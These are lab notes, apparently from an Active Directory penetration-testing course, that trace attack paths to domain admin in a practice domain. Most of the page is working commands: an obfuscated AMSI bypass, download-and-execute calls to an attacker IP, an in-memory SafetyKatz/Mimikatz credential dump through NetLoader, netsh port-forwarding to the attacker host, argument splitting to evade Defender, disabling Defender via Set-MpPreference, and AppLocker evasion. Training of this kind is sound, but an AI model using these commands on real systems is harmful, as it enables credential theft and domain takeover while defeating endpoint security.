Evasion

Lab 7 Scenario:

Attack Path 1:
- Student -> dcorp-ci via Jenkins
- dcorp-ci is local admin on -> dcorp-mgmt
- Using local admin privileges on dcorp-mgmt, we extracted domain admin credentials and use them to access dcorp-dc from Student.
Attack Path 2 (Derivative Local Admin or shortest path to DA):
- Student has local admin privilges on dcorp-adminsrv.
- To extract credentials, we evaded AppLocker.
- dcorp-adminsrv has derivative local admin privileges on dcorp-mgmt.
- We extracted domain admin credentials from dcorp-mgmt and used to access dcorp-dc from Student.
Student machine (student372) has exploited Jenkins to get a reverse shell on "dcorp\ciadmin"
From dcorp\ciadmin, we disable SB Logging to run AMSI bypass script. This is done to avoid PowerView detection.
We transfer PowerView to ciadmin to check domain sessions using Find-DomainUserLocationand find that there is a domain admin session on dcorp-mgmt server.
We can abuse this using WinRS or PSRemoting.
Abuse using WinRS
- We first check if we can execute commands on dcorp-mgmt and if WinRM port is open.
- Since we can run commands, we want to run SafetyKatz.exe on dcorp-mgmt.
- We want SafetyKatz.exe to run on memory without touching disk. For this, we download NetLoader and use xcopy (since we have admin on ciadmin) to copy Loader to dcorp-mgmt.
- We also want to avoid detection on dcorp-mgmt by calling remote IP to download SafeteKatz. So instead of directly calling attacker IP, we port forward localhost to attacker IP.
- Since Defender would detect SafetyKatz even with NetLoader, we encode arguments using ArgSplit.bat, copy the output to Safety.bat which runs SafetyKatz.exe through loader with the encoded Arguments.
- We download the Safety.bat on ciadmin and xcopy it to dcorp-mgmt.
- Finally, we use WinRS to run Safety.bat which uses Loader.exe to download and execute SafetyKatz.exe in-memory on dcorp-mgmt.
- We get credentials of svcadmin - a domain administrator.
Abuse using PSRemoting
- Check if we can execute commands on dcorp-mgmt using PSRemoting
- Download InvokeMimi.ps1 on dcorp-mgmt to dump hashes.
- Disable AMSI either using the conventional method or using Set-MpPreference (since we have admin access on dcorp-mgmt.
- After disabling, we run Invoke-command to call the Invoke-Mimi on the session objected we created while disabling AMSI.
- We finally get the hashes.
Using Over-Pass-The-Hash
- We can use O-PTH to use svcadmin's credentials.
- From an elevated shell, we can use Rubeus, SafetyKatz, Invoke-Mimi to get a process from hash we obtained earlier as domain controller.
Derivative Local Admin
- We are trying to find the machines on which student372 has admin privileges using Find-PSRemotingLocalAdminAccess
- We find student372 has local admin access to dcorp-adminsrv. We use Enter-PSSession to get a shell on dcorp-adminsrv as student372.
- When we try to turn of script logging or bypass AMSI, it does not work because PSRemoting uses Constrained Language Mode (CLM).
- We can check this using $ExecutionContext.SessionState.LanguageMode
- This is either because of AppLocker of WDAC (Windows Defender Application Control). Both of these are application allow listing solutions from Microsoft. We can check AppLocker Policy using: Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections cc
- We find that everyone can run scripts from Program Files directory.
- We can disable Defender and run any script in ProgramFiles.
- We cannot use dot sourcing because of CLM, so we use Invoke-MimiEx.ps1 which adds "Invoke-Mimi -Command sekurlsa::ekeys" at the end of the Invoke-Mimi.ps1 file.
- From student machine, we copy Invoke-MimiEx.ps1 to dcorp-adminsrv's ProgramFiles.

AMSI Bypass

First disable Enhanced Script Block Logging so that AMSI is not logged.

 iex (iwr http://172.16.100.72/sbloggingbypass.txt -UseBasicParsing)

Then run the below command to bypass AMSI

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

NetLoader

Download and xcopy.

iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe

echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

Port Forward Localhost:80 to Attacker Machine

$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72"

Running SafetyKatz.bat

Use Loader without Encoding

iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe

$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

Use Loader after Encoding (Safety.bat)

Encode SafetyKatz arguments using Argsplit.bat

C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: sekurlsa::ekeys
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"

Include Argsplit output in Safety.bat

@echo off
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
echo %Pwn%
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -Args
%Pwn% exit"

Download & Execute SafetyKatz.exe in-memory

iwr http://172.16.100.72/Safety.bat -OutFile C:\Users\Public\Safety.bat

echo F | xcopy C:\Users\Public\Safety.bat \\dcorp-mgmt\C$\Users\Public\Safety.bat

$null | winrs -r:dcorp-mgmt "cmd /c C:\Users\Public\Safety.bat"

PowerShell Remoting

Check if we can run cmds on dcorp-mgmt using PSRemoting

Invoke-Command -ScriptBlock {$env:username;$env:computername} -ComputerName dcorp-mgmt

Use Invoke-Mimi to dump hashes of domain admin svcadmin:

iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing)

Disable AMSI using Set-MpPreference

$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess

Run Invoke-Mimi and get hashes

Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess

PreviousDCSync NextEvasion Cheetsheet

Last updated 1 year ago